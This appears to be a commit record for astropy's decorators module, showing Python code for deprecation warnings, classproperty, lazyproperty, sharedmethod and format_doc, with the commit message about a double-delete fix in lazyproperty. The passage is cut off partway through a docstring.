def deprecate_function(func, message, warning_type=warning_type):
"""
Returns a wrapped function that displays ``warning_type``
when it is called.
"""
if isinstance(func, method_types):
func_wrapper = type(func)
else:
func_wrapper = lambda f: f
func = get_function(func)
def deprecated_func(*args, **kwargs):
if pending:
category = AstropyPendingDeprecationWarning
else:
category = warning_type
warnings.warn(message, category, stacklevel=2)
return func(*args, **kwargs)
# If this is an extension function, we can't call
# functools.wraps on it, but we normally don't care.
# This crazy way to get the type of a wrapper descriptor is
# straight out of the Python 3.3 inspect module docs.
if type(func) is not type(str.__dict__['__add__']): # nopep8
deprecated_func = functools.wraps(func)(deprecated_func)
deprecated_func.__doc__ = deprecate_doc(
deprecated_func.__doc__, message)
return func_wrapper(deprecated_func)
def deprecate_class(cls, message, warning_type=warning_type):
"""
Update the docstring and wrap the ``__init__`` in-place (or ``__new__``
if the class or any of the bases overrides ``__new__``) so it will give
a deprecation warning when an instance is created.
This won't work for extension classes because these can't be modified
in-place and the alternatives don't work in the general case:
- Using a new class that looks and behaves like the original doesn't
work because the __new__ method of extension types usually makes sure
that it's the same class or a subclass.
- Subclassing the class and return the subclass can lead to problems
with pickle and will look weird in the Sphinx docs.
"""
cls.__doc__ = deprecate_doc(cls.__doc__, message)
if cls.__new__ is object.__new__:
cls.__init__ = deprecate_function(get_function(cls.__init__),
message, warning_type)
else:
cls.__new__ = deprecate_function(get_function(cls.__new__),
message, warning_type)
return cls
def deprecate(obj, message=message, name=name, alternative=alternative,
pending=pending, warning_type=warning_type):
if obj_type is None:
if isinstance(obj, type):
obj_type_name = 'class'
elif inspect.isfunction(obj):
obj_type_name = 'function'
elif inspect.ismethod(obj) or isinstance(obj, method_types):
obj_type_name = 'method'
else:
obj_type_name = 'object'
else:
obj_type_name = obj_type
if not name:
name = get_function(obj).__name__
altmessage = ''
if not message or type(message) is type(deprecate):
if pending:
message = ('The {func} {obj_type} will be deprecated in a '
'future version.')
else:
message = ('The {func} {obj_type} is deprecated and may '
'be removed in a future version.')
if alternative:
altmessage = f'\n Use {alternative} instead.'
message = ((message.format(**{
'func': name,
'name': name,
'alternative': alternative,
'obj_type': obj_type_name})) +
altmessage)
if isinstance(obj, type):
return deprecate_class(obj, message, warning_type)
else:
return deprecate_function(obj, message, warning_type)
if type(message) is type(deprecate):
return deprecate(message)
return deprecate
def deprecated_attribute(name, since, message=None, alternative=None,
pending=False, warning_type=AstropyDeprecationWarning):
"""
Used to mark a public attribute as deprecated. This creates a
property that will warn when the given attribute name is accessed.
To prevent the warning (i.e. for internal code), use the private
name for the attribute by prepending an underscore
(i.e. ``self._name``).
Parameters
----------
name : str
The name of the deprecated attribute.
since : str
The release at which this API became deprecated. This is
required.
message : str, optional
Override the default deprecation message. The format
specifier ``name`` may be used for the name of the attribute,
and ``alternative`` may be used in the deprecation message
to insert the name of an alternative to the deprecated
function.
alternative : str, optional
An alternative attribute that the user may use in place of the
deprecated attribute. The deprecation warning will tell the
user about this alternative if provided.
pending : bool, optional
If True, uses a AstropyPendingDeprecationWarning instead of
``warning_type``.
warning_type : warning
Warning to be issued.
Default is `~astropy.utils.exceptions.AstropyDeprecationWarning`.
Examples
--------
::
class MyClass:
# Mark the old_name as deprecated
old_name = misc.deprecated_attribute('old_name', '0.1')
def method(self):
self._old_name = 42
"""
private_name = '_' + name
@deprecated(since, name=name, obj_type='attribute', warning_type=warning_type)
def get(self):
return getattr(self, private_name)
@deprecated(since, name=name, obj_type='attribute', warning_type=warning_type)
def set(self, val):
setattr(self, private_name, val)
@deprecated(since, name=name, obj_type='attribute', warning_type=warning_type)
def delete(self):
delattr(self, private_name)
return property(get, set, delete)
def deprecated_renamed_argument(old_name, new_name, since,
arg_in_kwargs=False, relax=False,
pending=False,
warning_type=AstropyDeprecationWarning,
alternative=''):
"""Deprecate a _renamed_ or _removed_ function argument.
The decorator assumes that the argument with the ``old_name`` was removed
from the function signature and the ``new_name`` replaced it at the
**same position** in the signature. If the ``old_name`` argument is
given when calling the decorated function the decorator will catch it and
issue a deprecation warning and pass it on as ``new_name`` argument.
Parameters
----------
old_name : str or list/tuple thereof
The old name of the argument.
new_name : str or list/tuple thereof or `None`
The new name of the argument. Set this to `None` to remove the
argument ``old_name`` instead of renaming it.
since : str or number or list/tuple thereof
The release at which the old argument became deprecated.
arg_in_kwargs : bool or list/tuple thereof, optional
If the argument is not a named argument (for example it
was meant to be consumed by ``**kwargs``) set this to
``True``. Otherwise the decorator will throw an Exception
if the ``new_name`` cannot be found in the signature of
the decorated function.
Default is ``False``.
relax : bool or list/tuple thereof, optional
If ``False`` a ``TypeError`` is raised if both ``new_name`` and
``old_name`` are given. If ``True`` the value for ``new_name`` is used
and a Warning is issued.
Default is ``False``.
pending : bool or list/tuple thereof, optional
If ``True`` this will hide the deprecation warning and ignore the
corresponding ``relax`` parameter value.
Default is ``False``.
warning_type : warning
Warning to be issued.
Default is `~astropy.utils.exceptions.AstropyDeprecationWarning`.
alternative : str, optional
An alternative function or class name that the user may use in
place of the deprecated object if ``new_name`` is None. The deprecation
warning will tell the user about this alternative if provided.
Raises
------
TypeError
If the new argument name cannot be found in the function
signature and arg_in_kwargs was False or if it is used to
deprecate the name of the ``*args``-, ``**kwargs``-like arguments.
At runtime such an Error is raised if both the new_name
and old_name were specified when calling the function and
"relax=False".
Notes
-----
The decorator should be applied to a function where the **name**
of an argument was changed but it applies the same logic.
.. warning::
If ``old_name`` is a list or tuple the ``new_name`` and ``since`` must
also be a list or tuple with the same number of entries. ``relax`` and
``arg_in_kwarg`` can be a single bool (applied to all) or also a
list/tuple with the same number of entries like ``new_name``, etc.
Examples
--------
The deprecation warnings are not shown in the following examples.
To deprecate a positional or keyword argument::
>>> from astropy.utils.decorators import deprecated_renamed_argument
>>> @deprecated_renamed_argument('sig', 'sigma', '1.0')
... def test(sigma):
... return sigma
>>> test(2)
2
>>> test(sigma=2)
2
>>> test(sig=2) # doctest: +SKIP
2
To deprecate an argument caught inside the ``**kwargs`` the
``arg_in_kwargs`` has to be set::
>>> @deprecated_renamed_argument('sig', 'sigma', '1.0',
... arg_in_kwargs=True)
... def test(**kwargs):
... return kwargs['sigma']
>>> test(sigma=2)
2
>>> test(sig=2) # doctest: +SKIP
2
By default providing the new and old keyword will lead to an Exception. If
a Warning is desired set the ``relax`` argument::
>>> @deprecated_renamed_argument('sig', 'sigma', '1.0', relax=True)
... def test(sigma):
... return sigma
>>> test(sig=2) # doctest: +SKIP
2
It is also possible to replace multiple arguments. The ``old_name``,
``new_name`` and ``since`` have to be `tuple` or `list` and contain the
same number of entries::
>>> @deprecated_renamed_argument(['a', 'b'], ['alpha', 'beta'],
... ['1.0', 1.2])
... def test(alpha, beta):
... return alpha, beta
>>> test(a=2, b=3) # doctest: +SKIP
(2, 3)
In this case ``arg_in_kwargs`` and ``relax`` can be a single value (which
is applied to all renamed arguments) or must also be a `tuple` or `list`
with values for each of the arguments.
"""
cls_iter = (list, tuple)
if isinstance(old_name, cls_iter):
n = len(old_name)
# Assume that new_name and since are correct (tuple/list with the
# appropriate length) in the spirit of the "consenting adults". But the
# optional parameters may not be set, so if these are not iterables
# wrap them.
if not isinstance(arg_in_kwargs, cls_iter):
arg_in_kwargs = [arg_in_kwargs] * n
if not isinstance(relax, cls_iter):
relax = [relax] * n
if not isinstance(pending, cls_iter):
pending = [pending] * n
else:
# To allow a uniform approach later on, wrap all arguments in lists.
n = 1
old_name = [old_name]
new_name = [new_name]
since = [since]
arg_in_kwargs = [arg_in_kwargs]
relax = [relax]
pending = [pending]
def decorator(function):
# The named arguments of the function.
arguments = signature(function).parameters
keys = list(arguments.keys())
position = [None] * n
for i in range(n):
# Determine the position of the argument.
if arg_in_kwargs[i]:
pass
else:
if new_name[i] is None:
param = arguments[old_name[i]]
elif new_name[i] in arguments:
param = arguments[new_name[i]]
# In case the argument is not found in the list of arguments
# the only remaining possibility is that it should be caught
# by some kind of **kwargs argument.
# This case has to be explicitly specified, otherwise throw
# an exception!
else:
raise TypeError(
f'"{new_name[i]}" was not specified in the function '
'signature. If it was meant to be part of '
'"**kwargs" then set "arg_in_kwargs" to "True"')
# There are several possibilities now:
# 1.) Positional or keyword argument:
if param.kind == param.POSITIONAL_OR_KEYWORD:
if new_name[i] is None:
position[i] = keys.index(old_name[i])
else:
position[i] = keys.index(new_name[i])
# 2.) Keyword only argument:
elif param.kind == param.KEYWORD_ONLY:
# These cannot be specified by position.
position[i] = None
# 3.) positional-only argument, varargs, varkwargs or some
# unknown type:
else:
raise TypeError(f'cannot replace argument "{new_name[i]}" '
f'of kind {repr(param.kind)}.')
@functools.wraps(function)
def wrapper(*args, **kwargs):
for i in range(n):
message = (f'"{old_name[i]}" was deprecated in version '
f'{since[i]} and will be removed in a future '
'version. ')
# The only way to have oldkeyword inside the function is
# that it is passed as kwarg because the oldkeyword
# parameter was renamed to newkeyword.
if old_name[i] in kwargs:
value = kwargs.pop(old_name[i])
# Display the deprecation warning only when it's not
# pending.
if not pending[i]:
if new_name[i] is not None:
message += f'Use argument "{new_name[i]}" instead.'
elif alternative:
message += f'\n Use {alternative} instead.'
warnings.warn(message, warning_type, stacklevel=2)
# Check if the newkeyword was given as well.
newarg_in_args = (position[i] is not None and
len(args) > position[i])
newarg_in_kwargs = new_name[i] in kwargs
if newarg_in_args or newarg_in_kwargs:
if not pending[i]:
# If both are given print a Warning if relax is
# True or raise an Exception is relax is False.
if relax[i]:
warnings.warn(
f'"{old_name[i]}" and "{new_name[i]}" '
'keywords were set. '
f'Using the value of "{new_name[i]}".',
AstropyUserWarning)
else:
raise TypeError(
f'cannot specify both "{old_name[i]}" and '
f'"{new_name[i]}".')
else:
# Pass the value of the old argument with the
# name of the new argument to the function
if new_name[i] is not None:
kwargs[new_name[i]] = value
# If old argument has no replacement, cast it back.
# https://github.com/astropy/astropy/issues/9914
else:
kwargs[old_name[i]] = value
# Deprecated keyword without replacement is given as
# positional argument.
elif (not pending[i] and not new_name[i] and position[i] and
len(args) > position[i]):
if alternative:
message += f'\n Use {alternative} instead.'
warnings.warn(message, warning_type, stacklevel=2)
return function(*args, **kwargs)
return wrapper
return decorator
# TODO: This can still be made to work for setters by implementing an
# accompanying metaclass that supports it; we just don't need that right this
# second
class classproperty(property):
"""
Similar to `property`, but allows class-level properties. That is,
a property whose getter is like a `classmethod`.
The wrapped method may explicitly use the `classmethod` decorator (which
must become before this decorator), or the `classmethod` may be omitted
(it is implicit through use of this decorator).
.. note::
classproperty only works for *read-only* properties. It does not
currently allow writeable/deletable properties, due to subtleties of how
Python descriptors work. In order to implement such properties on a class
a metaclass for that class must be implemented.
Parameters
----------
fget : callable
The function that computes the value of this property (in particular,
the function when this is used as a decorator) a la `property`.
doc : str, optional
The docstring for the property--by default inherited from the getter
function.
lazy : bool, optional
If True, caches the value returned by the first call to the getter
function, so that it is only called once (used for lazy evaluation
of an attribute). This is analogous to `lazyproperty`. The ``lazy``
argument can also be used when `classproperty` is used as a decorator
(see the third example below). When used in the decorator syntax this
*must* be passed in as a keyword argument.
Examples
--------
::
>>> class Foo:
... _bar_internal = 1
... @classproperty
... def bar(cls):
... return cls._bar_internal + 1
...
>>> Foo.bar
2
>>> foo_instance = Foo()
>>> foo_instance.bar
2
>>> foo_instance._bar_internal = 2
>>> foo_instance.bar # Ignores instance attributes
2
As previously noted, a `classproperty` is limited to implementing
read-only attributes::
>>> class Foo:
... _bar_internal = 1
... @classproperty
... def bar(cls):
... return cls._bar_internal
... @bar.setter
... def bar(cls, value):
... cls._bar_internal = value
...
Traceback (most recent call last):
...
NotImplementedError: classproperty can only be read-only; use a
metaclass to implement modifiable class-level properties
When the ``lazy`` option is used, the getter is only called once::
>>> class Foo:
... @classproperty(lazy=True)
... def bar(cls):
... print("Performing complicated calculation")
... return 1
...
>>> Foo.bar
Performing complicated calculation
1
>>> Foo.bar
1
If a subclass inherits a lazy `classproperty` the property is still
re-evaluated for the subclass::
>>> class FooSub(Foo):
... pass
...
>>> FooSub.bar
Performing complicated calculation
1
>>> FooSub.bar
1
"""
def __new__(cls, fget=None, doc=None, lazy=False):
if fget is None:
# Being used as a decorator--return a wrapper that implements
# decorator syntax
def wrapper(func):
return cls(func, lazy=lazy)
return wrapper
return super().__new__(cls)
def __init__(self, fget, doc=None, lazy=False):
self._lazy = lazy
if lazy:
self._lock = threading.RLock() # Protects _cache
self._cache = {}
fget = self._wrap_fget(fget)
super().__init__(fget=fget, doc=doc)
# There is a buglet in Python where self.__doc__ doesn't
# get set properly on instances of property subclasses if
# the doc argument was used rather than taking the docstring
# from fget
# Related Python issue: https://bugs.python.org/issue24766
if doc is not None:
self.__doc__ = doc
def __get__(self, obj, objtype):
if self._lazy:
val = self._cache.get(objtype, _NotFound)
if val is _NotFound:
with self._lock:
# Check if another thread initialised before we locked.
val = self._cache.get(objtype, _NotFound)
if val is _NotFound:
val = self.fget.__wrapped__(objtype)
self._cache[objtype] = val
else:
# The base property.__get__ will just return self here;
# instead we pass objtype through to the original wrapped
# function (which takes the class as its sole argument)
val = self.fget.__wrapped__(objtype)
return val
def getter(self, fget):
return super().getter(self._wrap_fget(fget))
def setter(self, fset):
raise NotImplementedError(
"classproperty can only be read-only; use a metaclass to "
"implement modifiable class-level properties")
def deleter(self, fdel):
raise NotImplementedError(
"classproperty can only be read-only; use a metaclass to "
"implement modifiable class-level properties")
@staticmethod
def _wrap_fget(orig_fget):
if isinstance(orig_fget, classmethod):
orig_fget = orig_fget.__func__
# Using stock functools.wraps instead of the fancier version
# found later in this module, which is overkill for this purpose
@functools.wraps(orig_fget)
def fget(obj):
return orig_fget(obj.__class__)
return fget
# Adapted from the recipe at
# http://code.activestate.com/recipes/363602-lazy-property-evaluation
class lazyproperty(property):
"""
Works similarly to property(), but computes the value only once.
This essentially memorizes the value of the property by storing the result
of its computation in the ``__dict__`` of the object instance. This is
useful for computing the value of some property that should otherwise be
invariant. For example::
>>> class LazyTest:
... @lazyproperty
... def complicated_property(self):
... print('Computing the value for complicated_property...')
... return 42
...
>>> lt = LazyTest()
>>> lt.complicated_property
Computing the value for complicated_property...
42
>>> lt.complicated_property
42
As the example shows, the second time ``complicated_property`` is accessed,
the ``print`` statement is not executed. Only the return value from the
first access off ``complicated_property`` is returned.
By default, a setter and deleter are used which simply overwrite and
delete, respectively, the value stored in ``__dict__``. Any user-specified
setter or deleter is executed before executing these default actions.
The one exception is that the default setter is not run if the user setter
already sets the new value in ``__dict__`` and returns that value and the
returned value is not ``None``.
"""
def __init__(self, fget, fset=None, fdel=None, doc=None):
super().__init__(fget, fset, fdel, doc)
self._key = self.fget.__name__
self._lock = threading.RLock()
def __get__(self, obj, owner=None):
try:
obj_dict = obj.__dict__
val = obj_dict.get(self._key, _NotFound)
if val is _NotFound:
with self._lock:
# Check if another thread beat us to it.
val = obj_dict.get(self._key, _NotFound)
if val is _NotFound:
val = self.fget(obj)
obj_dict[self._key] = val
return val
except AttributeError:
if obj is None:
return self
raise
def __set__(self, obj, val):
obj_dict = obj.__dict__
if self.fset:
ret = self.fset(obj, val)
if ret is not None and obj_dict.get(self._key) is ret:
# By returning the value set the setter signals that it
# took over setting the value in obj.__dict__; this
# mechanism allows it to override the input value
return
obj_dict[self._key] = val
def __delete__(self, obj):
if self.fdel:
self.fdel(obj)
obj.__dict__.pop(self._key, None) # Delete if present
if self._key in obj.__dict__:
del obj.__dict__[self._key]
class sharedmethod(classmethod):
"""
This is a method decorator that allows both an instancemethod and a
`classmethod` to share the same name.
When using `sharedmethod` on a method defined in a class's body, it
may be called on an instance, or on a class. In the former case it
behaves like a normal instance method (a reference to the instance is
automatically passed as the first ``self`` argument of the method)::
>>> class Example:
... @sharedmethod
... def identify(self, *args):
... print('self was', self)
... print('additional args were', args)
...
>>> ex = Example()
>>> ex.identify(1, 2)
self was <astropy.utils.decorators.Example object at 0x...>
additional args were (1, 2)
In the latter case, when the `sharedmethod` is called directly from a
class, it behaves like a `classmethod`::
>>> Example.identify(3, 4)
self was <class 'astropy.utils.decorators.Example'>
additional args were (3, 4)
This also supports a more advanced usage, where the `classmethod`
implementation can be written separately. If the class's *metaclass*
has a method of the same name as the `sharedmethod`, the version on
the metaclass is delegated to::
>>> class ExampleMeta(type):
... def identify(self):
... print('this implements the {0}.identify '
... 'classmethod'.format(self.__name__))
...
>>> class Example(metaclass=ExampleMeta):
... @sharedmethod
... def identify(self):
... print('this implements the instancemethod')
...
>>> Example().identify()
this implements the instancemethod
>>> Example.identify()
this implements the Example.identify classmethod
"""
def __get__(self, obj, objtype=None):
if obj is None:
mcls = type(objtype)
clsmeth = getattr(mcls, self.__func__.__name__, None)
if callable(clsmeth):
func = clsmeth
else:
func = self.__func__
return self._make_method(func, objtype)
else:
return self._make_method(self.__func__, obj)
@staticmethod
def _make_method(func, instance):
return types.MethodType(func, instance)
def format_doc(docstring, *args, **kwargs):
"""
Replaces the docstring of the decorated object and then formats it.
The formatting works like :meth:`str.format` and if the decorated object
already has a docstring this docstring can be included in the new
documentation if you use the ``{__doc__}`` placeholder.
Its primary use is for reusing a *long* docstring in multiple functions
when it is the same or only slightly different between them.
Parameters
----------
docstring : str or object or None
The docstring that will replace the docstring of the decorated
object. If it is an object like a function or class it will
take the docstring of this object. If it is a string it will use the
string itself. One special case is if the string is ``None`` then
it will use the decorated functions docstring and formats it.
args :
passed to :meth:`str.format`.
kwargs :
passed to :meth:`str.format`. If the function has a (not empty)
docstring the original docstring is added to the kwargs with the
keyword ``'__doc__'``.
Raises
------
ValueError
If the ``docstring`` (or interpreted docstring if it was ``None``
or not a string) is empty.
IndexError, KeyError
If a placeholder in the (interpreted) ``docstring`` was not filled. see
:meth:`str.format` for more information.
Notes
-----
Using this decorator allows, for example Sphinx, to parse the
correct docstring.
Examples
--------
Replacing the current docstring is very easy::
>>> from astropy.utils.decorators import format_doc
>>> @format_doc('''Perform num1 + num2''')
... def add(num1, num2):
... return num1+num2
...
>>> help(add) # doctest: +SKIP
Help on function add in module __main__:
<BLANKLINE>
add(num1, num2)
Perform num1 + num2
sometimes instead of replacing you only want to add to it::
>>> doc = '''
... {__doc__}
... Parameters
... ----------
... num1, num2 : Numbers
... Returns
... -------
... result: Number
... '''
>>> @format_doc(doc)
... def add(num1, num2):
... '''Perform addition.'''
... return num1+num2
...
>>> help(add) # doctest: +SKIP
Help on function add in module __main__:
<BLANKLINE>
add(num1, num2)
Perform addition.
Parameters
----------
num1, num2 : Numbers
Returns
-------
result : Number
in case one might want to format it further::
>>> doc = '''
... Perform {0}.
... Parameters
... ----------
... num1, num2 : Numbers
... Returns
... -------
... result: Number
... result of num1 {op} num2
... {__doc__}
... '''
>>> @format_doc(doc, 'addition', op='+')
... def add(num1, num2):
... return num1+num2
...
>>> @format_doc(doc, 'subtraction', op='-')
... def subtract(num1, num2):
... '''Notes: This one has additional notes.'''
... return num1-num2
...
>>> help(add) # doctest: +SKIP
Help on function add in module __main__:
<BLANKLINE>
add(num1, num2)
Perform addition.
Parameters
----------
num1, num2 : Numbers
Returns
-------
result : Number
result of num1 + num2
>>> help(subtract) # doctest: +SKIP
Help on function subtract in module __main__:
<BLANKLINE>
subtract(num1, num2)
Perform subtraction.
Parameters
----------
num1, num2 : Numbers
Returns
-------
result : Number
result of num1 - num2
Notes : This one has additional notes.
These methods can be combined an even taking the docstring from another
object is possible as docstring attribute. You just have to specify the
object::
>>> @format_doc(add)
... def another_add(num1, num2):
... return num1 + num2
...
>>> help(another_add) # doctest: +SKIP
Help on function another_add in module __main__:
<BLANKLINE>
another_add(num1, num2)
Perform addition.
Parameters
----------
num1, num2 : Numbers
Returns
-------
result : Number
result of num1 + num2
But be aware that this decorator *only* formats the given docstring not
the strings passed as ``args`` or ``kwargs`` (not even the original
docstring)::
>>> @format_doc(doc, 'addition', op='+')
... def yet_another_add(num1, num2):
... '''This one is good for {0}.'''
... return num1 + num2
...
>>> help(yet_another_add) # doctest: +SKIP
Help on function yet_another_add in module __main__:
<BLANKLINE>
yet_another_add(num1, num2)
Perform addition.
Parameters
----------
num1, num2 : Numbers
Returns
-------
result : Number
result of num1 + num2
This one is good for {0}.
To work around it you could specify the docstring to be ``None``::
>>> @format_doc(None, 'addition')
... def last_add_i_swear(num1, num2):
... '''This one is good for {0}.'''
... return num1 + num2
...
>>> help(last_add_i_swear) # doctest: +SKIP
Help on function last_add_i_swear in module __main__:
<BLANKLINE>
last_add_i_swear(num1, num2)
This one is good for addition.
Using it with ``None`` as docstring allows to use the decorator twice
on an object to first parse the new docstring and then to parse the
original docstring or the ``args`` and ``kwargs``.
"""
def set_docstring(obj):
if docstring is None:
# None means: use the objects __doc__
doc = obj.__doc__
# Delete documentation in this case so we don't end up with
# awkwardly self-inserted docs.
obj.__doc__ = None
elif isinstance(docstring, str):
# String: use the string that was given
doc = docstring
else:
# Something else: Use the __doc__ of this
doc = docstring.__doc__
if not doc:
# In case the docstring is empty it's probably not what was wanted.
raise ValueError('docstring must be a string or containing a '
'docstring that is not empty.')
# If the original has a not-empty docstring append it to the format
# kwargs.
kwargs['__doc__'] = obj.__doc__ or ''
obj.__doc__ = doc.format(*args, **kwargs)
return obj
return set_docstring
Fix accidental double-delete in lazyproperty
I'd added alternate code for deleting, but failed to remove the
original.
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Sundry function and class decorators."""
import functools
import inspect
import textwrap
import threading
import types
import warnings
from inspect import signature
from functools import wraps
from .exceptions import (AstropyDeprecationWarning, AstropyUserWarning,
AstropyPendingDeprecationWarning)
__all__ = ['classproperty', 'deprecated', 'deprecated_attribute',
'deprecated_renamed_argument', 'format_doc',
'lazyproperty', 'sharedmethod', 'wraps']
_NotFound = object()
def deprecated(since, message='', name='', alternative='', pending=False,
obj_type=None, warning_type=AstropyDeprecationWarning):
"""
Used to mark a function or class as deprecated.
To mark an attribute as deprecated, use `deprecated_attribute`.
Parameters
------------
since : str
The release at which this API became deprecated. This is
required.
message : str, optional
Override the default deprecation message. The format
specifier ``func`` may be used for the name of the function,
and ``alternative`` may be used in the deprecation message
to insert the name of an alternative to the deprecated
function. ``obj_type`` may be used to insert a friendly name
for the type of object being deprecated.
name : str, optional
The name of the deprecated function or class; if not provided
the name is automatically determined from the passed in
function or class, though this is useful in the case of
renamed functions, where the new function is just assigned to
the name of the deprecated function. For example::
def new_function():
...
oldFunction = new_function
alternative : str, optional
An alternative function or class name that the user may use in
place of the deprecated object. The deprecation warning will
tell the user about this alternative if provided.
pending : bool, optional
If True, uses a AstropyPendingDeprecationWarning instead of a
``warning_type``.
obj_type : str, optional
The type of this object, if the automatically determined one
needs to be overridden.
warning_type : warning
Warning to be issued.
Default is `~astropy.utils.exceptions.AstropyDeprecationWarning`.
"""
method_types = (classmethod, staticmethod, types.MethodType)
def deprecate_doc(old_doc, message):
"""
Returns a given docstring with a deprecation message prepended
to it.
"""
if not old_doc:
old_doc = ''
old_doc = textwrap.dedent(old_doc).strip('\n')
new_doc = (('\n.. deprecated:: {since}'
'\n {message}\n\n'.format(
**{'since': since, 'message': message.strip()})) + old_doc)
if not old_doc:
# This is to prevent a spurious 'unexpected unindent' warning from
# docutils when the original docstring was blank.
new_doc += r'\ '
return new_doc
def get_function(func):
"""
Given a function or classmethod (or other function wrapper type), get
the function object.
"""
if isinstance(func, method_types):
func = func.__func__
return func
def deprecate_function(func, message, warning_type=warning_type):
"""
Returns a wrapped function that displays ``warning_type``
when it is called.
"""
if isinstance(func, method_types):
func_wrapper = type(func)
else:
func_wrapper = lambda f: f
func = get_function(func)
def deprecated_func(*args, **kwargs):
if pending:
category = AstropyPendingDeprecationWarning
else:
category = warning_type
warnings.warn(message, category, stacklevel=2)
return func(*args, **kwargs)
# If this is an extension function, we can't call
# functools.wraps on it, but we normally don't care.
# This crazy way to get the type of a wrapper descriptor is
# straight out of the Python 3.3 inspect module docs.
if type(func) is not type(str.__dict__['__add__']): # nopep8
deprecated_func = functools.wraps(func)(deprecated_func)
deprecated_func.__doc__ = deprecate_doc(
deprecated_func.__doc__, message)
return func_wrapper(deprecated_func)
def deprecate_class(cls, message, warning_type=warning_type):
"""
Update the docstring and wrap the ``__init__`` in-place (or ``__new__``
if the class or any of the bases overrides ``__new__``) so it will give
a deprecation warning when an instance is created.
This won't work for extension classes because these can't be modified
in-place and the alternatives don't work in the general case:
- Using a new class that looks and behaves like the original doesn't
work because the __new__ method of extension types usually makes sure
that it's the same class or a subclass.
- Subclassing the class and return the subclass can lead to problems
with pickle and will look weird in the Sphinx docs.
"""
cls.__doc__ = deprecate_doc(cls.__doc__, message)
if cls.__new__ is object.__new__:
cls.__init__ = deprecate_function(get_function(cls.__init__),
message, warning_type)
else:
cls.__new__ = deprecate_function(get_function(cls.__new__),
message, warning_type)
return cls
def deprecate(obj, message=message, name=name, alternative=alternative,
pending=pending, warning_type=warning_type):
if obj_type is None:
if isinstance(obj, type):
obj_type_name = 'class'
elif inspect.isfunction(obj):
obj_type_name = 'function'
elif inspect.ismethod(obj) or isinstance(obj, method_types):
obj_type_name = 'method'
else:
obj_type_name = 'object'
else:
obj_type_name = obj_type
if not name:
name = get_function(obj).__name__
altmessage = ''
if not message or type(message) is type(deprecate):
if pending:
message = ('The {func} {obj_type} will be deprecated in a '
'future version.')
else:
message = ('The {func} {obj_type} is deprecated and may '
'be removed in a future version.')
if alternative:
altmessage = f'\n Use {alternative} instead.'
message = ((message.format(**{
'func': name,
'name': name,
'alternative': alternative,
'obj_type': obj_type_name})) +
altmessage)
if isinstance(obj, type):
return deprecate_class(obj, message, warning_type)
else:
return deprecate_function(obj, message, warning_type)
if type(message) is type(deprecate):
return deprecate(message)
return deprecate
def deprecated_attribute(name, since, message=None, alternative=None,
pending=False, warning_type=AstropyDeprecationWarning):
"""
Used to mark a public attribute as deprecated. This creates a
property that will warn when the given attribute name is accessed.
To prevent the warning (i.e. for internal code), use the private
name for the attribute by prepending an underscore
(i.e. ``self._name``).
Parameters
----------
name : str
The name of the deprecated attribute.
since : str
The release at which this API became deprecated. This is
required.
message : str, optional
Override the default deprecation message. The format
specifier ``name`` may be used for the name of the attribute,
and ``alternative`` may be used in the deprecation message
to insert the name of an alternative to the deprecated
function.
alternative : str, optional
An alternative attribute that the user may use in place of the
deprecated attribute. The deprecation warning will tell the
user about this alternative if provided.
pending : bool, optional
If True, uses a AstropyPendingDeprecationWarning instead of
``warning_type``.
warning_type : warning
Warning to be issued.
Default is `~astropy.utils.exceptions.AstropyDeprecationWarning`.
Examples
--------
::
class MyClass:
# Mark the old_name as deprecated
old_name = misc.deprecated_attribute('old_name', '0.1')
def method(self):
self._old_name = 42
"""
private_name = '_' + name
@deprecated(since, name=name, obj_type='attribute', warning_type=warning_type)
def get(self):
return getattr(self, private_name)
@deprecated(since, name=name, obj_type='attribute', warning_type=warning_type)
def set(self, val):
setattr(self, private_name, val)
@deprecated(since, name=name, obj_type='attribute', warning_type=warning_type)
def delete(self):
delattr(self, private_name)
return property(get, set, delete)
def deprecated_renamed_argument(old_name, new_name, since,
arg_in_kwargs=False, relax=False,
pending=False,
warning_type=AstropyDeprecationWarning,
alternative=''):
"""Deprecate a _renamed_ or _removed_ function argument.
The decorator assumes that the argument with the ``old_name`` was removed
from the function signature and the ``new_name`` replaced it at the
**same position** in the signature. If the ``old_name`` argument is
given when calling the decorated function the decorator will catch it and
issue a deprecation warning and pass it on as ``new_name`` argument.
Parameters
----------
old_name : str or list/tuple thereof
The old name of the argument.
new_name : str or list/tuple thereof or `None`
The new name of the argument. Set this to `None` to remove the
argument ``old_name`` instead of renaming it.
since : str or number or list/tuple thereof
The release at which the old argument became deprecated.
arg_in_kwargs : bool or list/tuple thereof, optional
If the argument is not a named argument (for example it
was meant to be consumed by ``**kwargs``) set this to
``True``. Otherwise the decorator will throw an Exception
if the ``new_name`` cannot be found in the signature of
the decorated function.
Default is ``False``.
relax : bool or list/tuple thereof, optional
If ``False`` a ``TypeError`` is raised if both ``new_name`` and
``old_name`` are given. If ``True`` the value for ``new_name`` is used
and a Warning is issued.
Default is ``False``.
pending : bool or list/tuple thereof, optional
If ``True`` this will hide the deprecation warning and ignore the
corresponding ``relax`` parameter value.
Default is ``False``.
warning_type : warning
Warning to be issued.
Default is `~astropy.utils.exceptions.AstropyDeprecationWarning`.
alternative : str, optional
An alternative function or class name that the user may use in
place of the deprecated object if ``new_name`` is None. The deprecation
warning will tell the user about this alternative if provided.
Raises
------
TypeError
If the new argument name cannot be found in the function
signature and arg_in_kwargs was False or if it is used to
deprecate the name of the ``*args``-, ``**kwargs``-like arguments.
At runtime such an Error is raised if both the new_name
and old_name were specified when calling the function and
"relax=False".
Notes
-----
The decorator should be applied to a function where the **name**
of an argument was changed but it applies the same logic.
.. warning::
If ``old_name`` is a list or tuple the ``new_name`` and ``since`` must
also be a list or tuple with the same number of entries. ``relax`` and
``arg_in_kwarg`` can be a single bool (applied to all) or also a
list/tuple with the same number of entries like ``new_name``, etc.
Examples
--------
The deprecation warnings are not shown in the following examples.
To deprecate a positional or keyword argument::
>>> from astropy.utils.decorators import deprecated_renamed_argument
>>> @deprecated_renamed_argument('sig', 'sigma', '1.0')
... def test(sigma):
... return sigma
>>> test(2)
2
>>> test(sigma=2)
2
>>> test(sig=2) # doctest: +SKIP
2
To deprecate an argument caught inside the ``**kwargs`` the
``arg_in_kwargs`` has to be set::
>>> @deprecated_renamed_argument('sig', 'sigma', '1.0',
... arg_in_kwargs=True)
... def test(**kwargs):
... return kwargs['sigma']
>>> test(sigma=2)
2
>>> test(sig=2) # doctest: +SKIP
2
By default providing the new and old keyword will lead to an Exception. If
a Warning is desired set the ``relax`` argument::
>>> @deprecated_renamed_argument('sig', 'sigma', '1.0', relax=True)
... def test(sigma):
... return sigma
